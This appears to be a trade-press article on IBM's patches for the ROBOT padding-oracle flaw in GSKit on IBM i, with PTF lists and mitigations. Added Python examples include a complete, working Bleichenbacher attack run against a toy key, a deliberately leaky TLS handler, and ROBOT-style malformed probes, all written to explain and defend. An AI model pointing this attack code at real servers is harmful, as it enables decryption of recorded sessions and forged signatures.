IBM Patches ‘ROBOT’ Flaw in IBM i Crypto Library

    February 21, 2018 Alex Woodie

    IBM has issued patches to fix a serious security problem in the IBM Global Security Kit, or GSKit, a relatively obscure crypto package that implements SSL/TLS across a variety of IBM products, including IBM i. The underlying weakness is not new. It is a 1998 attack on the way RSA-encrypted data is padded: an attacker who can tell from a server’s error behaviour whether a decrypted block was padded correctly has a “padding oracle,” a side channel good enough to decrypt captured traffic. It has resurfaced under a new moniker: “ROBOT.”

    GSKit is an IBM toolkit that implements various encryption-related functions, including symmetric and asymmetric ciphers, random number generation, hashing algorithms, and encryption key management, for products that need over-the-wire encryption. It ships on the IBM i, Linux, and AIX operating systems and inside WebSphere MQ, WebSphere Application Server, the Db2 database, and Tivoli middleware. In addition to the crypto library, it provides command-line tools for managing the key databases and certificates those products use for SSL/TLS.

    One of the standards GSKit implements is PKCS#1, the first of the Public-Key Cryptography Standards published by RSA Laboratories, which specifies how the RSA primitive is used for encryption and signatures. “Textbook” RSA applied directly to a message is not secure: it is deterministic, and it is malleable, because multiplying a ciphertext by s^e mod n yields the encryption of the plaintext times s. PKCS#1 therefore pads the message into a block the length of the modulus before it is encrypted. In the version 1.5 encryption scheme, a block of k bytes is laid out as 00 02, at least eight random non-zero padding bytes, a 00 separator, and then the message, and a receiver that decrypts a block and does not find that structure must report a decryption error. That check is where the trouble starts: if the sender can tell whether it passed or failed, the receiver has become a padding “oracle,” leaking one bit about the plaintext of any ciphertext the attacker cares to submit.

    The crypto module underneath GSKit is FIPS 140-2 certified, which gives customers confidence in its algorithms and key handling. FIPS validation, however, says nothing about whether an implementation leaks information through its error behaviour, and that is exactly where the serious problems with PKCS#1 v1.5 padding have been found.

    Back in 1998, Daniel Bleichenbacher, then a researcher at Bell Labs, showed that a Secure Sockets Layer (SSL) server, at the time the industry standard for encrypting a stream of data on a network, could be turned into just such an oracle. An SSL client sends the RSA-encrypted premaster secret, from which both sides derive the session keys, in its ClientKeyExchange message, and servers of the day responded with a distinctive error when the decrypted block had bad PKCS#1 padding. By submitting on the order of a million carefully chosen modifications of a captured ciphertext and noting which ones the server accepted, Bleichenbacher could decrypt it: an “adaptive chosen-ciphertext attack,” because each query is chosen in light of the answers to the previous ones.

    In practice, the attack lets anyone who can send messages to the server decrypt an RSA-encrypted premaster secret they recorded earlier, and with it the session keys and the contents of that recorded session. That is the passive-capture-then-decrypt scenario, and it applies to any session that used RSA key exchange, which offers no forward secrecy. The same oracle, run in reverse, lets the attacker produce a signature with the server’s private key over data of their choosing. What the attack does not do is reveal the private key itself. The “side channel” is the padding-validity information: the attacker submits ciphertexts that decrypt to blocks with invalid PKCS padding and learns from the server’s TLS error responses which of them happened to start with the expected 00 02.
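
    The attack described above, carried through end to end as an added example (this is not IBM, GSKit, or the ROBOT team’s code). It builds a deliberately tiny RSA key from two known Mersenne primes, pads and encrypts a message exactly as PKCS#1 v1.5 prescribes, exposes the one bit a vulnerable server leaks (does the decrypted block start with 00 02?), and then runs Bleichenbacher’s interval-narrowing algorithm using nothing but that oracle and RSA’s malleability. The key is chosen so the ratio of the modulus to the padding boundary B is small and the search finishes in a few hundred to a few thousand queries; against a real 2048-bit key the same loop needs tens of thousands to around a million queries, depending on how strict the oracle is. The “loose” oracle (first two bytes only) is an assumption: several ROBOT-affected stacks leaked exactly that, and a stricter oracle only costs more queries.

```python
"""Bleichenbacher's attack on PKCS#1 v1.5 RSA encryption, run end to end
against a toy key (added example; not IBM, GSKit or ROBOT-team code)."""
import os

# Toy RSA key from two known Mersenne primes, 2^107-1 and 2^31-1 (~138-bit
# modulus). Hopelessly small for real use; the attack is the same at 2048 bits.
P = (1 << 107) - 1
Q = (1 << 31) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8          # modulus length in bytes: 18
B = 1 << (8 * (K - 2))                 # conformant plaintexts are the integers in [2B, 3B)


def pkcs1_v15_pad(msg: bytes) -> bytes:
    """EME-PKCS1-v1_5 (RFC 8017 7.2.1): 00 02 || PS || 00 || M, PS >= 8 non-zero bytes."""
    ps_len = K - 3 - len(msg)
    if ps_len < 8:
        raise ValueError("message too long")
    ps = bytearray()
    while len(ps) < ps_len:
        ps += bytes(b for b in os.urandom(ps_len - len(ps)) if b)   # drop zero bytes
    return b"\x00\x02" + bytes(ps) + b"\x00" + msg


def pkcs1_v15_unpad(em: bytes) -> bytes:
    sep = em.find(b"\x00", 2)
    if em[:2] != b"\x00\x02" or sep < 10:
        raise ValueError("decryption error")
    return em[sep + 1:]


def encrypt(msg: bytes) -> int:
    return pow(int.from_bytes(pkcs1_v15_pad(msg), "big"), E, N)


def decrypt_raw(c: int) -> bytes:
    return pow(c, D, N).to_bytes(K, "big")


def padding_oracle(c: int) -> bool:
    """The one bit a vulnerable server leaks: does the block start with 00 02?
    A 'loose' oracle like this is what several ROBOT-affected stacks exposed;
    one that checks the whole structure still works, it just costs more queries."""
    return decrypt_raw(c)[:2] == b"\x00\x02"


def ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def bleichenbacher(c: int, oracle) -> tuple[bytes, int]:
    """Recover the padded plaintext of c from the oracle alone (Bleichenbacher 1998).
    c is assumed conformant already (a real ClientKeyExchange is), so the
    blinding step is skipped and s0 = 1. Returns (plaintext block, query count)."""
    queries = 0

    def conformant(s: int) -> bool:
        nonlocal queries
        queries += 1
        return oracle(c * pow(s, E, N) % N)     # RSA malleability: decrypts to m*s mod N

    M = [(2 * B, 3 * B - 1)]                    # everything known about m so far
    s = ceil_div(N, 3 * B)                      # step 2a: smallest s that can wrap m*s past N
    while not conformant(s):
        s += 1
    while True:
        # Step 3: m*s mod N in [2B, 3B) means m*s = rN + t with t in [2B, 3B);
        # each feasible r pins m into [(2B + rN)/s, (3B - 1 + rN)/s].
        narrowed = set()
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    narrowed.add((lo, hi))
        M = sorted(narrowed)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0].to_bytes(K, "big"), queries
        if len(M) > 1:                          # step 2b: several intervals, keep scanning s upward
            s += 1
            while not conformant(s):
                s += 1
        else:                                   # step 2c: one interval, so jump s ahead using r
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), N)
            while True:
                lo, hi = ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a
                hit = next((cand for cand in range(lo, hi + 1) if conformant(cand)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1


def demo(msg: bytes = b"ROBOT") -> tuple[bytes, int]:
    """Encrypt msg, then recover it using nothing but the padding oracle."""
    block, queries = bleichenbacher(encrypt(msg), padding_oracle)
    return pkcs1_v15_unpad(block), queries


if __name__ == "__main__":
    recovered, queries = demo()
    print(f"recovered {recovered!r} after {queries} oracle queries")
```

    Nothing in `bleichenbacher()` touches the private exponent D; only `padding_oracle()` does, standing in for the server. Because the target ciphertext is a genuine encryption (as a captured ClientKeyExchange is), the blinding step of the original paper is skipped, so the single value the intervals collapse to is the padded plaintext itself.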

    Instead of replacing the padding scheme, the protocol designers added workarounds. Transport Layer Security (TLS), the successor to SSL first described in 1999 and today the standard way of protecting HTTP, FTP, and other Internet protocols, requires a server that finds bad padding not to say so: it must carry on with a freshly generated random premaster secret as if decryption had succeeded, so that the only failure the client ever sees is a later MAC error on the Finished message, which looks the same whether the padding was good or bad. Later revisions added more rules of the same kind, for instance for the check on the client version number embedded in the premaster secret, because each separately reported failure is another oracle. Those countermeasures live in TLS, not in PKCS#1 itself.
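
    The two server behaviours contrasted above, side by side, as an added example (not GSKit code): `vulnerable_premaster()` reports each failed check with a different alert, and `hardened_premaster()` applies the RFC 5246 section 7.4.7.1 rule, drawing a random premaster secret before looking at the block, running every check to completion, and substituting the random value on any failure. The probe blocks are constructed test data modelled on the malformed ClientKeyExchange messages the ROBOT scanner sends; they stand in for the output of the RSA decryption, which is omitted here. The alert names and `leaks_oracle()` are this example’s own model of what a network attacker can observe.

```python
"""Handling of the RSA-decrypted ClientKeyExchange block: distinguishable
errors beside the RFC 5246 7.4.7.1 countermeasure. Added example, not
GSKit/IBM code; it starts from the already-decrypted block."""
import hmac
import os

PMS_LEN = 48                      # premaster secret: client_version (2 bytes) || 46 random bytes
CLIENT_VERSION = b"\x03\x03"      # TLS 1.2, as announced in the ClientHello


class Alert(Exception):
    """A TLS alert sent to the peer; its type is what the attacker observes."""


def vulnerable_premaster(em: bytes, client_version: bytes = CLIENT_VERSION) -> bytes:
    """Pre-countermeasure logic: every check fails loudly and differently."""
    if em[:2] != b"\x00\x02":
        raise Alert("decrypt_error")            # bad padding: the Bleichenbacher oracle
    sep = em.find(b"\x00", 2)
    if sep < 10:                                # PS shorter than 8 bytes, or no separator
        raise Alert("decrypt_error")
    pms = em[sep + 1:]
    if len(pms) != PMS_LEN:
        raise Alert("illegal_parameter")        # length oracle
    if pms[:2] != client_version:
        raise Alert("handshake_failure")        # version oracle
    return pms


def ct_select(flag: int, a: bytes, b: bytes) -> bytes:
    """a if flag == 1 else b, chosen with a mask rather than a branch."""
    mask = -flag & 0xFF                         # 0xFF when flag == 1, 0x00 when flag == 0
    return bytes((x & mask) | (y & ~mask & 0xFF) for x, y in zip(a, b))


def hardened_premaster(em: bytes, client_version: bytes = CLIENT_VERSION) -> bytes:
    """RFC 5246 7.4.7.1: pick a random premaster secret first, run every check
    to completion with no early exit, and on any failure use the random value.
    The handshake then continues and fails only at the Finished MAC, exactly
    as it would for a ciphertext the attacker could not have known anyway.
    (Python gives no real constant-time guarantees; the control flow and the
    observable outcome are the point.)"""
    k = len(em)
    fallback = client_version + os.urandom(PMS_LEN - 2)
    good = int(em[0] == 0) & int(em[1] == 2) & int(em[k - PMS_LEN - 1] == 0)
    for byte in em[2:k - PMS_LEN - 1]:          # PS must be non-zero; scan all of it, never break
        good &= int(byte != 0)
    pms = em[k - PMS_LEN:]                      # always take the last 48 bytes, whatever the padding
    good &= int(hmac.compare_digest(pms[:2], client_version))
    return ct_select(good, pms, fallback)


def make_block(k: int = 256, prefix: bytes = b"\x00\x02", pms=None,
               separator: bytes = b"\x00") -> bytes:
    """Constructed k-byte block, as the server would see it after RSA decryption."""
    pms = pms if pms is not None else CLIENT_VERSION + b"\x11" * (PMS_LEN - 2)
    return prefix + b"\xff" * (k - len(prefix) - len(separator) - len(pms)) + separator + pms


PROBES = {                                      # modelled on the malformed messages ROBOT sends
    "well formed": make_block(),
    "bad first bytes": make_block(prefix=b"\x41\x17"),
    "no separator": make_block(separator=b"\xff"),
    "wrong length": make_block(pms=b"\x03\x03" + b"\x11" * 45),
    "wrong version": make_block(pms=b"\x02\x02" + b"\x11" * 46),
}


def observe(handler, em: bytes) -> str:
    """What the network sees from one probe: a specific alert, or a handshake that goes on."""
    try:
        handler(em)
        return "handshake continues"
    except Alert as alert:
        return f"alert {alert}"


def responses(handler) -> dict[str, str]:
    return {name: observe(handler, em) for name, em in PROBES.items()}


def leaks_oracle(handler) -> bool:
    """ROBOT's test in miniature: differing reactions to malformed probes mean an oracle."""
    return len(set(responses(handler).values())) > 1


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_premaster), ("hardened", hardened_premaster)):
        print(name, responses(handler), "-> oracle" if leaks_oracle(handler) else "-> no oracle")
```

    In the hardened version a malformed block produces a 48-byte secret the attacker cannot predict, and since the attacker never knew the premaster secret for a forged ciphertext in the first place, the subsequent Finished failure is identical in both the good-padding and bad-padding cases. Real implementations also have to keep the timing of the two paths indistinguishable, which was the harder part of several ROBOT findings.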

    A padding scheme designed to resist the attack, RSA-OAEP, has been part of PKCS#1 since version 2.0 in 1998 and is carried forward in the current version 2.2, but TLS never adopted it for key exchange. The then-forthcoming TLS 1.3 solves the problem by dropping RSA key transport altogether. Every earlier TLS version still encrypts the premaster secret under the version 1.5 padding and relies on implementations getting the increasingly complex workarounds exactly right, and some RSA implementations do not.

    In December 2017, Hanno Böck, Juraj Somorovsky, and Craig Young showed that a variation of Bleichenbacher’s technique still worked against modern HTTPS servers speaking TLS 1.2, letting them decrypt recorded sessions and sign data with a server’s private key. Their test is simple: send a handful of deliberately malformed RSA ClientKeyExchange messages and watch whether the server’s reactions, be they TLS alerts, timeouts, or dropped connections, differ from one another. They called the result Return Of Bleichenbacher’s Oracle Threat, or ROBOT.

    “Some of the most popular webpages on the Internet were affected, including Facebook and Paypal,” the researchers wrote on their website, called The ROBOT Attack. “In total, we found vulnerable subdomains on 27 of the top 100 domains as ranked by Alexa.”

    The researchers also identified a handful of hardware and software vendors whose TLS stacks react to malformed PKCS#1 padding in distinguishable ways, leaving their customers open to the attack. In addition to IBM, the impacted vendors listed on the ROBOT Attack website include Citrix Systems, F5 Networks, Cisco Systems, and Palo Alto Networks, among others.

    On February 1, the IBM GSKit vulnerability was assigned the Common Vulnerabilities and Exposures identifier CVE-2018-1388. It carries a CVSS base score of 9.1, which is critical: the score reflects an attack launched over the network with low complexity and no privileges or user interaction, whose success compromises both confidentiality (decrypted sessions) and integrity (signatures forged with the server’s key), while leaving availability untouched.

    According to a security bulletin published on January 15, IBM had already issued PTFs that address the flaw in IBM i 7.1, 7.2, and 7.3. On February 6, IBM issued a security bulletin alerting IBM i users to the flaw and to the availability of the patches. Three days later, it published a post on the Product Security Incident Response Team (PSIRT) blog pointing users to the security bulletin and the patches.

    All three supported versions of IBM i are affected. IBM recommends that IBM i customers immediately apply the following PTFs to fix the ROBOT flaw:

    IBM i 7.1 — MF64537
    IBM i 7.2 — MF64536
    IBM i 7.3 — MF64534

    In its APAR for the ROBOT attack, published in January, IBM says every release of IBM i going back to i5/OS V5R1 is affected by the GSKit vulnerability. IBM did not issue patches for the older releases, which are out of support. On those systems the only protection is to stop offering cipher suites that use RSA key exchange, the TLS_RSA_* suites in which the client encrypts the premaster secret under the server’s RSA key, so that there is nothing for the oracle to decrypt. Suites that use ephemeral Diffie-Hellman for key exchange and the RSA key only for signatures (ECDHE_RSA and DHE_RSA) do not expose the oracle and also provide forward secrecy, which is why IBM recommends that users of IBM i 7.2 and 7.3 make the switch anyway; on those releases the system-wide cipher list is set through the QSSLCSL system value. Two caveats apply. The oracle is a property of the private key, not of one server, so as long as any unpatched endpoint holding the same RSA key still accepts RSA key exchange, sessions recorded from any host using that key can be decrypted. And turning RSA key exchange off after the fact does nothing for sessions that were recorded while it was on.
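
    A check for that mitigation, as an added example against Python’s ssl module (OpenSSL underneath) rather than IBM i System SSL, where the equivalent control is the QSSLCSL system value; the cipher strings are this example’s choices, not IBM’s. It lists every enabled suite whose key exchange is plain RSA (`Kx=RSA` in OpenSSL’s description), which is the construction ROBOT attacks, and shows a cipher list that excludes them while keeping the ECDHE and DHE suites that use the RSA key only for signatures.

```python
"""List the RSA key-transport suites a TLS configuration still offers.
Added example against Python's ssl module; not IBM i System SSL."""
import ssl


def rsa_key_transport_suites(ctx: ssl.SSLContext) -> list[str]:
    """Names of enabled suites in which the client encrypts the premaster secret
    under the server's RSA key (OpenSSL marks them Kx=RSA). ECDHE-RSA and
    DHE-RSA suites use the RSA key only to sign and are not listed."""
    return [c["name"] for c in ctx.get_ciphers() if "Kx=RSA" in c["description"]]


def permissive_context() -> ssl.SSLContext:
    """Everything OpenSSL will offer, including the TLS_RSA_* suites, for contrast."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.set_ciphers("ALL")
    return ctx


def hardened_context() -> ssl.SSLContext:
    """Only ephemeral (forward-secret) key exchange; '!kRSA' removes RSA key transport."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:!kRSA:!aNULL")
    return ctx


if __name__ == "__main__":
    for label, ctx in (("permissive", permissive_context()), ("hardened", hardened_context())):
        print(label, rsa_key_transport_suites(ctx) or "no RSA key-transport suites")
```

    The same question has to be asked of every listener that shares the key, not just the one being hardened, for the reason given above: one forgotten service still accepting TLS_RSA_* suites keeps the oracle alive for all of them.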

    In addition to patching IBM i, IBM patched several releases of WebSphere MQ, which bundles the same GSKit, to address the vulnerability.

    RELATED STORIES

    IBM i Gets More PTFs for Meltdown and Spectre

    Evaluating Your IBM i Encryption Options

    Vulnerabilities In 3DES Encryption Put It Out To Pasture In IBM i

    Big Blue Patches 14 More OpenSSL Flaws In IBM i

    IBM Blocks ‘Bar Mitzvah’ Attack In SSL/TLS

    IBM Issues More POODLE Patches, Warns Not to Use SSLv3

    Heartbleed Postmortem: Time to Rethink Open Source Security?

    Heartbleed, OpenSSL, and IBM i: What You Need to Know



TFH Volume: 28 Issue: 14

Copyright © 2022 IT Jungle
